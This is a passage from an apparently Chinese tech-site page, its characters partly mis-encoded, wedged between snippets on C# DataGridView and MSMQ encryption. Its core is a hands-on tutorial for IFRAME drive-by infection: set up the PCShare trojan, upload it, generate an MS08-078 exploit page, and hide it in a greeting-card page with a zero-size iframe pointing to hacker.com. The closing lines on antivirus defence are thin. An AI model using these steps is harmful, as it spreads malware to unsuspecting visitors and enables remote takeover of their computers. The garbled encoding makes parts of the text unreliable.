推薦：解讀C#中對(duì)DatagridView的部分常用操作
dbfC#DataGridView中的常用技巧 只列出技巧部分,后面會(huì)有補(bǔ)充 0(最基本的技巧). 獲取某列中的某行(某單元格)中的內(nèi)容 this.currentposition = this.dataGridView1.BindingContext [this.dataGridView1.DataSource, this.dataGridView1.DataMember].Position;

什么是IFRAME框架掛馬

網(wǎng)頁(yè)掛馬到如今已經(jīng)發(fā)展出許多方法與應(yīng)用手段，其中IFRAME網(wǎng)頁(yè)框架掛馬是最典型的掛馬方式，也是最基本的掛馬方式，可以說(shuō)沒(méi)有IFRAME，網(wǎng)頁(yè)木馬中有一多半就無(wú)法很好地隱藏，讓用戶(hù)在不察覺(jué)中受到攻擊。

什么是IFRAME?IFRAME是一個(gè)非常普通的HTML語(yǔ)言標(biāo)記，它主要用來(lái)在一個(gè)網(wǎng)頁(yè)界面中，劃分出左右或者上下的框架，就如同我們電視機(jī)的畫(huà)中畫(huà)效果一樣。圖2中的山寨搜索引擎的界面就是典型的IFRAME的引用。

但是IFRAME功能也被黑客巧妙地利用了，黑客在一些看似正常的網(wǎng)頁(yè)中，使用長(zhǎng)寬為0的隱藏框架，讓用戶(hù)在不知不覺(jué)中打開(kāi)含有漏洞溢出內(nèi)容的網(wǎng)頁(yè)木馬，這種手法就如同在畫(huà)中畫(huà)電視中打開(kāi)了一個(gè)收費(fèi)頻道，但是由于收費(fèi)頻道的畫(huà)面尺寸被惡意修改成了0，所以看電視的人并不知道自己已經(jīng)打開(kāi)了收費(fèi)頻道，雖然他并沒(méi)有看到，但是事實(shí)上收費(fèi)頻道卻的確在播放，而且會(huì)收取用戶(hù)的使用費(fèi)。

IFRAME框架掛馬實(shí)戰(zhàn)

下面我們來(lái)做個(gè)演示，看看IFRAME框架掛馬到底是怎么做的。

第一步：準(zhǔn)備一款得心應(yīng)手的木馬，例如PCShare，這款軟件在設(shè)置上非常簡(jiǎn)單，易于操作上手。設(shè)置好相關(guān)服務(wù)，最后生成木馬所用的服務(wù)控制端。

第二步：使用FTP將木馬上傳到自己的網(wǎng)站空間中，并用記事本記錄下木馬的網(wǎng)絡(luò)路徑。然后再用《MS08-078網(wǎng)頁(yè)木馬生成器》，生成一個(gè)帶有MS08-078漏洞的惡意網(wǎng)頁(yè)。找一個(gè)正常的新年賀卡網(wǎng)頁(yè)，將該網(wǎng)頁(yè)保存到自己指定的目錄中，然后使用Web Designer或Dreamweaver網(wǎng)頁(yè)編輯軟件對(duì)保存的網(wǎng)頁(yè)進(jìn)行調(diào)整修改，然后上傳到自己的網(wǎng)站空間中，看圖片等內(nèi)容是否能夠正常顯示。

第三步：再一次打開(kāi)修改好的賀卡網(wǎng)頁(yè)，使用IFRAME標(biāo)記語(yǔ)句，將生成好的MS08-078網(wǎng)頁(yè)嵌入到賀卡網(wǎng)頁(yè)中，嵌入掛馬代碼如下： <iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>
將這段代碼拔出到賀卡網(wǎng)頁(yè)之中后，就完成了我們的網(wǎng)頁(yè)掛馬操作。瀏覽賀卡網(wǎng)頁(yè)的用戶(hù)，在看到賀卡頁(yè)面之后，也隨之運(yùn)行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出頁(yè)面，但是由于它的長(zhǎng)和寬都為“0”，觀(guān)看賀卡網(wǎng)站的用戶(hù)不會(huì)看到溢出頁(yè)面。
對(duì)于IFRAME標(biāo)記這種利用正常HTML語(yǔ)言功能實(shí)現(xiàn)隱藏的掛馬方式，目前并沒(méi)有好的防范方法，因?yàn)樗�是正常的網(wǎng)頁(yè)功能。大家只能夠寄希望于殺毒軟件和防掛馬軟件阻止利用IFRAME標(biāo)記內(nèi)嵌的溢出病毒網(wǎng)頁(yè)。我們建議在安裝殺毒軟件之后，能夠安裝第三方防掛馬軟件作為補(bǔ)充，例如銳甲、360等。 chinaitlab

分享：怎樣實(shí)現(xiàn)MSMQ的消息加密
消息加密的工作原理 消息應(yīng)用程序發(fā)送方對(duì)消息進(jìn)行加密后發(fā)送到目標(biāo)計(jì)算機(jī)的消息隊(duì)列中，然后由目標(biāo)計(jì)算機(jī)上的應(yīng)用程序接收消息隊(duì)列中的消息進(jìn)行解密。消息加密旨在防止在傳輸過(guò)程中有人未經(jīng)授權(quán)查看消息。 使用消息加密會(huì)降低性能，不過(guò)這沒(méi)有使用消息驗(yàn)證